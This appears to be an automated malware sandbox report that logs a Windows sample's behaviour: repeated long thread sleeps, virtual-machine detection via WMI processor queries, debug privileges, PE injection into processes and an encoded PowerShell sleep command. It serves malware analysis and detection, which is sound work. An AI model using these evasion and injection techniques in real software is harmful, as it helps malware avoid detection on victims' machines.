Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198420s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198170s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197536s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197152s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196956s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196679s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195809s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195436s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195200s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195076s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194077s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193733s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1193623s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6020 Thread sleep count: 9624 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5984 Thread sleep count: 9758 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984 Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 5388 Thread sleep count: 9746 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1668 Thread sleep count: 9716 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5892 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 836 Thread sleep count: 844 > 30
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199662s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199537s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199405s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1199200s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1198760s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1198310s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1197900s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1197786s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1197349s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1196761s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1196360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1196005s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1195758s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1195505s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1194897s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1194753s >= -30000s
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040 Thread sleep time: -1194348s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1200000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199875 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199624 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199498 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199344 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199203 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199047 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198938 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198794 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198680 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198547 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198420 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198297 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198170 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198031 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197921 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197797 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197671 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197536 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197391 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197265 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197152 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196956 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196797 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196679 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196547 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196250 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196094 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195921 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195809 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195688 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195547 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195436 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195328 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195200 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195076 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194953 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194844 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194734 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194625 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194515 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194406 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194297 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194187 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194077 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193969 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193844 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193733 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193623 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199662
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199537
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199405
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199200
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1198760
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1198310
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1197900
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1197786
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1197349
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1196761
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1196360
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1196005
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1195758
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1195505
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1194897
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1194753
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1194348
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 9732 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9388 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 9481 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Window / User API: threadDelayed 9624 Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Window / User API: threadDelayed 9758 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Window / User API: threadDelayed 9746
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8218
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Window / User API: threadDelayed 9716
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9319
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Window / User API: threadDelayed 844
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1200000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199875 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199624 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199498 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199344 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199203 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1199047 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198938 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198794 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198680 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198547 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198420 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198297 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198170 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1198031 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197921 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197797 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197671 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197536 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197391 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197265 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1197152 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196956 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196797 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196679 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196547 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196250 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1196094 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195921 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195809 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195688 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195547 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195436 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195328 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195200 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1195076 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194953 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194844 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194734 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194625 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194515 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194406 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194297 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194187 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1194077 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193969 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193844 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193733 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 1193623 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199662
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199537
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199405
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1199200
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1198760
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1198310
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1197900
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1197786
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1197349
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1196761
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1196360
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1196005
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1195758
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1195505
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1194897
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1194753
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Thread delayed: delay time: 1194348
Source: Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8j
Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.609344708.00000000010AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\file.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\file.exe Process created: Base64 decoded start-sleep -seconds 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: Base64 decoded start-sleep -seconds 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: Base64 decoded start-sleep -seconds 20 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Memory written: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Memory written: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
